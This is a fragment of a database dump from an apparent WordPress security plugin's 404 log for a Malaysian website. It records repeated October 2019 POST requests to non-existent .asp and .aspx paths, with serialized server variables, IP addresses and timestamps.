Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"218.3.55.24\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"218.3.55.24\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/ajax/jiafuyi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG050q-QPicCh3WFsYcfQAAAJY\";s:12:\"REDIRECT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/ajax/jiafuyi.asp\";s:10:\"SCRIPT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG050q-QPicCh3WFsYcfQAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927272.0175\";s:12:\"REQUEST_TIME\";s:10:\"1571927272\";}}','notice','2019-10-24 14:27:54','2019-10-24 14:27:52',35660600,37461080,'http://bintara.com.my//ajax/jiafuyi.asp',1,0,'218.3.55.24'),(28923,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//ajax/jiafuyi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"116.90.184.73\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"116.90.184.73\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/ajax/jiafuyi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG02v5cHc@dX2BdZ47DwQAAAA8\";s:12:\"REDIRECT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61178\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/ajax/jiafuyi.asp\";s:10:\"SCRIPT_URL\";s:17:\"/ajax/jiafuyi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG02v5cHc@dX2BdZ47DwQAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927258.5893\";s:12:\"REQUEST_TIME\";s:10:\"1571927258\";}}','notice','2019-10-24 14:27:40','2019-10-24 14:27:38',35340800,37139616,'http://bintara.com.my//ajax/jiafuyi.asp',1,0,'116.90.184.73'),(28922,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//html/15/35/index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.235.241.157\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.235.241.157\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0p0q-QPicCh3WFsYcRwAAAI4\";s:12:\"REDIRECT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60317\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0p0q-QPicCh3WFsYcRwAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927207.8831\";s:12:\"REQUEST_TIME\";s:10:\"1571927207\";}}','notice','2019-10-24 14:26:50','2019-10-24 14:26:48',35268984,37074208,'http://bintara.com.my//html/15/35/index.ashx',1,0,'61.235.241.157'),(28921,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//html/15/35/index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.246.129.195\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.246.129.195\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0kP5cHc@dX2BdZ47DogAAABM\";s:12:\"REDIRECT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59690\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0kP5cHc@dX2BdZ47DogAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927184.9181\";s:12:\"REQUEST_TIME\";s:10:\"1571927184\";}}','notice','2019-10-24 14:26:26','2019-10-24 14:26:25',35341768,37140456,'http://bintara.com.my//html/15/35/index.ashx',1,0,'218.246.129.195'),(28919,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//list/zongy-19.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"203.86.10.7\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"203.86.10.7\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/list/zongy-19.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/list/zongy-19.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0YEq-QPicCh3WFsYcFAAAAIs\";s:12:\"REDIRECT_URL\";s:19:\"/list/zongy-19.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58481\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/list/zongy-19.aspx\";s:10:\"SCRIPT_URL\";s:19:\"/list/zongy-19.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0YEq-QPicCh3WFsYcFAAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927136.5822\";s:12:\"REQUEST_TIME\";s:10:\"1571927136\";}}','notice','2019-10-24 14:25:38','2019-10-24 14:25:37',35272384,37076568,'http://bintara.com.my//list/zongy-19.aspx',1,0,'203.86.10.7'),(28920,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//html/15/35/index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"119.119.134.49\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"119.119.134.49\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0gf5cHc@dX2BdZ47DmAAAAAw\";s:12:\"REDIRECT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59234\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/html/15/35/index.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/html/15/35/index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0gf5cHc@dX2BdZ47DmAAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571927170.109\";s:12:\"REQUEST_TIME\";s:10:\"1571927170\";}}','notice','2019-10-24 14:26:12','2019-10-24 14:26:10',35264040,37060416,'http://bintara.com.my//html/15/35/index.ashx',1,0,'119.119.134.49'),(28918,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//list/zongy-19.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.192.176.170\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.192.176.170\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/list/zongy-19.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/list/zongy-19.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0U6HtjB8Y0WvpqtvIsAAAAMM\";s:12:\"REDIRECT_URL\";s:19:\"/list/zongy-19.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/list/zongy-19.aspx\";s:10:\"SCRIPT_URL\";s:19:\"/list/zongy-19.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0U6HtjB8Y0WvpqtvIsAAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927123.3299\";s:12:\"REQUEST_TIME\";s:10:\"1571927123\";}}','notice','2019-10-24 14:25:25','2019-10-24 14:25:23',35342072,37146144,'http://bintara.com.my//list/zongy-19.aspx',1,0,'220.192.176.170'),(28917,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/index.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.207.60.196\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.207.60.196\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/index.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/index.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0Pt2Cd74l7secq5lxGQAAAVg\";s:12:\"REDIRECT_URL\";s:17:\"/admin/index.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/index.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/admin/index.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0Pt2Cd74l7secq5lxGQAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927103.0065\";s:12:\"REQUEST_TIME\";s:10:\"1571927103\";}}','notice','2019-10-24 14:25:06','2019-10-24 14:25:03',35663616,37474664,'http://bintara.com.my//admin/index.aspx',1,0,'58.207.60.196'),(28916,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/index.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.101.56.185\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.101.56.185\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/index.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/index.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG0Ld2Cd74l7secq5lxDQAAAVM\";s:12:\"REDIRECT_URL\";s:17:\"/admin/index.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/index.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/admin/index.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG0Ld2Cd74l7secq5lxDQAAAVM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571927085.698\";s:12:\"REQUEST_TIME\";s:10:\"1571927085\";}}','notice','2019-10-24 14:24:47','2019-10-24 14:24:46',35339680,37145664,'http://bintara.com.my//admin/index.aspx',1,0,'202.101.56.185'),(28915,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//stat/images/show.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 